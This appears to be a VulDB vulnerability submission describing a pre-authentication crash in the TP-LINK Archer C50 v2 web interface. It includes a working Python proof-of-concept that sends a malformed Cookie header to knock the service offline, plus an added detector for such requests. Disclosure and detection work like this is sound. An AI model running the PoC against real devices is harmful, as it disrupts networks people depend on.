| Title | Web crash found on TP-LINK router (Archer C50(US)_V2_160801) |
|---|
| Description | # Web crash found on TP-LINK router (Archer C50(US)_V2_160801)
## Overview of the Vulnerability
This vulnerability exists in the TP-LINK Archer C50 v2 router (firmware version: Archer C50(US)_V2_160801, download link: https://www.tp-link.com/us/support/download/archer-c50/v2/#Firmware). It occurs when the cookie field of an HTTP request packet is parsed: the router crashes after parsing a malformed cookie. The vulnerability is triggered before authentication, so the router can be attacked without knowing the password of the web service. A single malformed request is enough to stop the router from functioning properly, and it has the potential to give control over the router.
## Business Impact
Exploiting the vulnerability is very simple and can result in indirect financial loss for the business. These malicious acts may also damage the business's reputation by affecting the trust of customers.
## Steps to Reproduce
I have attached the PoC code for reproduction below. You only need to modify the web IP address of the target device to exploit the vulnerability and crash the program.
## Proof of Concept (POC)
After executing the PoC script, try to visit the router's web management interface (or run 'telnet device_web_ip 80'); you will find that the web service has gone down.
```python
import requests

# Web management IP address of the device under test
device_web_ip = '192.168.0.1'

request = {
    'HEAD': {
        'Host': '{}'.format(device_web_ip),
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Connection': 'close',
        # Malformed cookie: a bare token with no "=value" part
        'Cookie': 'Authorization',
        'Upgrade-Insecure-Requests': '1',
        'Cache-Control': 'max-age=0'
    },
    'ATTR': {
        'URL': 'http://{}/'.format(device_web_ip),
        'METHOD': 'GET',
        'VERSION': 'HTTP/1.1'
    }
}

headers = request['HEAD']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']

try:
    r = requests.request(method=method, url=url, headers=headers, verify=False, timeout=0.5)
except requests.RequestException:
    # A timeout or connection error is expected once the web service stops responding
    pass
```
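
A defensive check for the request shape the PoC sends, as an added example that is not part of the original submission: it flags Cookie headers containing a token with no `=`, like the bare `Authorization` above, so such requests can be logged or dropped before they reach the management interface. It assumes the missing `=value` is what makes the cookie malformed (the submission does not state the root cause); `cookie_findings`, `triage` and the sample requests are constructed for illustration.

```python
# Added example (not from the submission): audit raw HTTP request heads for
# Cookie tokens that are not in "name=value" form (RFC 6265 cookie-pair).
# Assumption: the bare "Authorization" token in the PoC is the malformed shape.

def cookie_findings(raw_request: bytes) -> list[str]:
    """Return one finding per malformed cookie token in a raw HTTP request."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    findings = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            pair = pair.strip()
            if not pair:
                continue
            cname, eq, _ = pair.partition("=")
            if not eq:
                findings.append(f"cookie token without '=': {pair!r}")
            elif not cname.strip():
                findings.append(f"cookie pair with empty name: {pair!r}")
    return findings

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "poc_shape": b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n"
                 b"Cookie: Authorization\r\nConnection: close\r\n\r\n",
    "well_formed": b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n"
                   b"Cookie: Authorization=Basic%20Y29uc3RydWN0ZWQ=; lang=en\r\n\r\n",
    "mixed": b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n"
             b"cookie: lang=en; Authorization\r\n\r\n",
    "no_cookie": b"GET / HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
}

def triage(samples: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each sample name to its list of findings (empty list means clean)."""
    return {name: cookie_findings(raw) for name, raw in samples.items()}

if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(f"{name:12} {'ALERT' if findings else 'ok':5} {findings}")
```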
|
|---|
| User | a2ure (UID 41072) |
|---|
| Submitted | 2023-02-16 08:22 (3 years ago) |
|---|
| Moderation | 2023-02-21 10:23 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221552 [TP-Link Archer C50 V2_160801 Web Management Interface denial of service] |
|---|
| Points | 17 |
|---|